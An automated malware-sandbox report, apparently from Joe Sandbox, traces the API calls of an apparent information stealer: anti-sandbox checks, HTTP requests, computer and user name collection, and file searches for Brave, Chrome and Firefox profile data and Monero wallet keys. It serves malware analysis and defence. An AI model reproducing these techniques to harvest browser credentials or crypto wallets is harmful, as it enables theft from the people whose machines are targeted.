                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
                            • __aulldiv.LIBCMT ref: 00341258
                            • __aulldiv.LIBCMT ref: 00341266
                            • ExitProcess.KERNEL32 ref: 00341294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3404098578-2766056989
                            • Opcode ID: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
                            • Instruction ID: 89616c3a714f514f83bb070e44c8263ae8ea1c813480a7f38f523c4c8cb58eed
                            • Opcode Fuzzy Hash: eb4062b739788f81ea8bb6a95ee7aa3cb2f2a0cdba3446504afcdd145f4a79e9
                            • Instruction Fuzzy Hash: 840162B0D54308BAEB10DBD4DC49B9EB7B8AB14701F208445FB05FA1C0D7B465858B59

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1450 356af3 1451 356b0a 1450->1451 1453 356b0c-356b22 call 356920 call 355b10 CloseHandle ExitProcess 1451->1453 1454 356aba-356ad7 call 35aad0 OpenEventA 1451->1454 1460 356af5-356b04 CloseHandle Sleep 1454->1460 1461 356ad9-356af1 call 35aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                            APIs
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00356AF9
                            • Sleep.KERNEL32(00001770), ref: 00356B04
                            • CloseHandle.KERNEL32(?,00000000,?,00FB9A18,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
                            • ExitProcess.KERNEL32 ref: 00356B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                            • String ID:
                            • API String ID: 941982115-0
                            • Opcode ID: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
                            • Instruction ID: 7ca6c2cff937c667f464f8121d166fbb90cf78de86f2f577988831ca61fb0437
                            • Opcode Fuzzy Hash: ab91cdc0da7125066772b957a35eda6debbdb9cd11996f96f7f3cf7c087761aa
                            • Instruction Fuzzy Hash: 31F05E70944209ABF702ABA0DC0BFBD7B78EB14702F904515BD03F61E1DBB05548EB66

                            Control-flow Graph

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1274457161-4251816714
                            • Opcode ID: bffaeb948e0216c56d61e84d6dcca346d5bf8e961cb428d2df80200bdff6d989
                            • Instruction ID: 537ace44f4bd1676352b0421dc7cbf0fbc418c119856fe83136c368f856cae22
                            • Opcode Fuzzy Hash: bffaeb948e0216c56d61e84d6dcca346d5bf8e961cb428d2df80200bdff6d989
                            • Instruction Fuzzy Hash: A3214FB1D00209ABDF14DFA4E845ADE7B74FB44320F108625F915AB2D1EB706A09DF91

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                              • Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                              • Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                              • Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                              • Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                              • Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00355228
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                            • String ID: ERROR$ERROR
                            • API String ID: 3287882509-2579291623
                            • Opcode ID: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
                            • Instruction ID: 25dc88a6e1770f70b723a7171814f03509e4affc678b48b4256841f97a937995
                            • Opcode Fuzzy Hash: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
                            • Instruction Fuzzy Hash: 82111F30900508A6CB15FF60DD52EED7778AF50301F408654FC1A5E5A2EF306B09E791
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
                            • Instruction ID: 8fe26494bcd6fe7142d658902e07557b935ebeaa651a54b75a60f0d97ba0d8c8
                            • Opcode Fuzzy Hash: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
                            • Instruction Fuzzy Hash: AF016DB1A04208EBD710DF98DD45FAAFBB8FB04B22F10421AEE45A2690C37459088BA1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
                            • ExitProcess.KERNEL32 ref: 00341143
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AllocCurrentExitNumaVirtual
                            • String ID:
                            • API String ID: 1103761159-0
                            • Opcode ID: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
                            • Instruction ID: a8f467ad42c93c1126d2746b8ed9821c7bd4229069f2be097e4aaaf657b2c99d
                            • Opcode Fuzzy Hash: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
                            • Instruction Fuzzy Hash: 96E0E670A45348FBF710ABA09C0AB1976B8EB14B41F105055FB09BA1D0D6B53645AB9A
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003410B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003410F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
                            • Instruction ID: 38812c7dca60289d99d36021b221bd454364c06f323ab752fa2003c314e82581
                            • Opcode Fuzzy Hash: 66769a9fd8544d901a5484ec3fffafb11aaea8f856139ba2661dc1d3f54a3681
                            • Instruction Fuzzy Hash: F2F0E271641208BBE7149BA4AC49FAAB7E8E705B15F301448F904E7280E571AE44DBA0
                            APIs
                              • Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
                              • Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
                              • Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F
                              • Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
                              • Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
                              • Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F
                            • ExitProcess.KERNEL32 ref: 003411C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
                            • Instruction ID: 9ea1172836815cee43c54cda6eb28ffdd35e4a04b16087319b7c52c3344b57fc
                            • Opcode Fuzzy Hash: 9ff5723d009bd4b120970f87786c61783b28a4049763ebc4665950e9c9fc28b1
                            • Instruction Fuzzy Hash: 00E012B591430153DE0173B1BC0BF2A339C5B24347F041425FE05EB122FE29F848966A
                            APIs
                            • wsprintfA.USER32 ref: 003538CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003538E3
                            • lstrcat.KERNEL32(?,?), ref: 00353935
                            • StrCmpCA.SHLWAPI(?,00360F70), ref: 00353947
                            • StrCmpCA.SHLWAPI(?,00360F74), ref: 0035395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00353C67
                            • FindClose.KERNEL32(000000FF), ref: 00353C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: 77e00680e05eca6e031995495eef61478d900654f2992611177dfbb6f864b1e3
                            • Instruction ID: f43075923ab2b77ac0b2d09da63d2e5abf835a8cd914e7b49dec2c3905464327
                            • Opcode Fuzzy Hash: 77e00680e05eca6e031995495eef61478d900654f2992611177dfbb6f864b1e3
                            • Instruction Fuzzy Hash: 89A152B1A002089BDB25DF64DC85FEE7378FB58301F044589F90DAA155EB75AB88CF62
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00360B32,00360B2B,00000000,?,?,?,003613F4,00360B2A), ref: 0034BEF5
                            • StrCmpCA.SHLWAPI(?,003613F8), ref: 0034BF4D
                            • StrCmpCA.SHLWAPI(?,003613FC), ref: 0034BF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034C7BF
                            • FindClose.KERNEL32(000000FF), ref: 0034C7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: 101404be076ef840dfa694f0602f553f27c733748438bd4f2e5143f264f22181
                            • Instruction ID: b6c4b0df0da5c36b486c2e7d07bc5727c2b96897120ed72455de16721797ead4
                            • Opcode Fuzzy Hash: 101404be076ef840dfa694f0602f553f27c733748438bd4f2e5143f264f22181
                            • Instruction Fuzzy Hash: 844275719101089BDB16FBB0DC56EED777CAB54301F404658FD06AA0A1EF34AB4DEBA2
                            APIs
                            • wsprintfA.USER32 ref: 0035492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00354943
                            • StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                            • StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                            • FindClose.KERNEL32(000000FF), ref: 00354B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: 2f0e6314dcdd2be600bc34a2006271de492d87870ad88f2d2cb1dcff31064192
                            • Instruction ID: d0a44581778ecfcd9a958c788cdf9f63c21507853d497a6a3bc6eabc747019a2
                            • Opcode Fuzzy Hash: 2f0e6314dcdd2be600bc34a2006271de492d87870ad88f2d2cb1dcff31064192
                            • Instruction Fuzzy Hash: E1619A71900208ABDB25EFA0DC45FEA737CFB58301F048589F909A6054EB74EB89DFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00354587
                            • wsprintfA.USER32 ref: 003545A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003545BD
                            • StrCmpCA.SHLWAPI(?,00360FC4), ref: 003545EB
                            • StrCmpCA.SHLWAPI(?,00360FC8), ref: 00354601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0035468B
                            • FindClose.KERNEL32(000000FF), ref: 003546A0
                            • lstrcat.KERNEL32(?,00FBE8E8), ref: 003546C5
                            • lstrcat.KERNEL32(?,00FBDAA0), ref: 003546D8
                            • lstrlen.KERNEL32(?), ref: 003546E5
                            • lstrlen.KERNEL32(?), ref: 003546F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 47a7124414468c94ed26b61fc476c99a208d968c67c987bde60bf5d076f26150
                            • Instruction ID: e1a554fd4c31482bd5947c2493ddb80aed904ee11e0eeaaf895a44030a077252
                            • Opcode Fuzzy Hash: 47a7124414468c94ed26b61fc476c99a208d968c67c987bde60bf5d076f26150
                            • Instruction Fuzzy Hash: EC5168B19002189BD725EB70DC89FEE737CAB58301F404589FA09A6154EB749B8DDFA2
                            APIs
                            • wsprintfA.USER32 ref: 00353EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 00353EDA
                            • StrCmpCA.SHLWAPI(?,00360FAC), ref: 00353F08
                            • StrCmpCA.SHLWAPI(?,00360FB0), ref: 00353F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0035406C
                            • FindClose.KERNEL32(000000FF), ref: 00354081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: 614ad791ec720cad6be4f3a2b8c47d17c7e862e8d491fd39f8945b2e995a0475
                            • Instruction ID: 4521daf7041de2627f8036a2b8e21248d555c577eb67188a48c429b955a89d72
                            • Opcode Fuzzy Hash: 614ad791ec720cad6be4f3a2b8c47d17c7e862e8d491fd39f8945b2e995a0475
                            • Instruction Fuzzy Hash: 66517CB2900218ABDB25FBB0DC45EEA737CBB54301F004589FA59A6050EB75EB8DDF61
                            APIs
                            • wsprintfA.USER32 ref: 0034ED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 0034ED55
                            • StrCmpCA.SHLWAPI(?,00361538), ref: 0034EDAB
                            • StrCmpCA.SHLWAPI(?,0036153C), ref: 0034EDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034F2AE
                            • FindClose.KERNEL32(000000FF), ref: 0034F2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 9531cb50d2286861ebf6f3e42c54707abefa2724ce02b5761f8a7f9d018efc89
                            • Instruction ID: c38bd533848aaf78d6c1c1619416671e679d459c4c1cb11ef6e75b3d3a1d8bdc
                            • Opcode Fuzzy Hash: 9531cb50d2286861ebf6f3e42c54707abefa2724ce02b5761f8a7f9d018efc89
                            • Instruction Fuzzy Hash: 6EE146719116185ADB56FB60CC52EEE777CBF54301F404299B80A6A062EF306F8EEF51
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003615B8,00360D96), ref: 0034F71E
                            • StrCmpCA.SHLWAPI(?,003615BC), ref: 0034F76F
                            • StrCmpCA.SHLWAPI(?,003615C0), ref: 0034F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0034FAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 6508b9f13698a1f229e580412b90d4bafb196f8da2a5aa845d39951c47b2920d
                            • Instruction ID: ca260112845ce9ec7e0f4d34a4318cc71196c122a2b480de675a6e757445bbb1
                            • Opcode Fuzzy Hash: 6508b9f13698a1f229e580412b90d4bafb196f8da2a5aa845d39951c47b2920d
                            • Instruction Fuzzy Hash: 4FB153719006189BDB25EF60DC56EEE7778AF54301F4082A8EC0A9E151EF306B4DEF92
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0036510C,?,?,?,003651B4,?,?,00000000,?,00000000), ref: 00341923
                            • StrCmpCA.SHLWAPI(?,0036525C), ref: 00341973
                            • StrCmpCA.SHLWAPI(?,00365304), ref: 00341989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341D40
                            • DeleteFileA.KERNEL32(00000000), ref: 00341DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00341E20
                            • FindClose.KERNEL32(000000FF), ref: 00341E32
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 765ef3baf01c4917d3b6b942bae4bd92b90fafd9c77d603b015d8fe3ef8d01e4
                            • Instruction ID: 8fa5030dccd594055603ca7c1b4a8a0485c1a83898c809e177195f2414ae0852
                            • Opcode Fuzzy Hash: 765ef3baf01c4917d3b6b942bae4bd92b90fafd9c77d603b015d8fe3ef8d01e4
                            • Instruction Fuzzy Hash: 0412E2719105189BDB16FB60CC96EEE7778BF54301F404299B9066A0A1EF306F8DEFA1
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00360C2E), ref: 0034DE5E
                            • StrCmpCA.SHLWAPI(?,003614C8), ref: 0034DEAE
                            • StrCmpCA.SHLWAPI(?,003614CC), ref: 0034DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0034E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0034E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 57daf548c47b5ab8a6c9ed7c83123f7f39764f887d7d95033d21a1890e88c74f
                            • Instruction ID: 8ba360ce4d8803fa2e5a34e38c850d2a1c9a275f866dc20690eb78bd4eb23025
                            • Opcode Fuzzy Hash: 57daf548c47b5ab8a6c9ed7c83123f7f39764f887d7d95033d21a1890e88c74f
                            • Instruction Fuzzy Hash: 67F19F718145189ADB17FB60CC95EEE7778BF14301F8042D9A80A6A0A1EF306F8EEF51
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
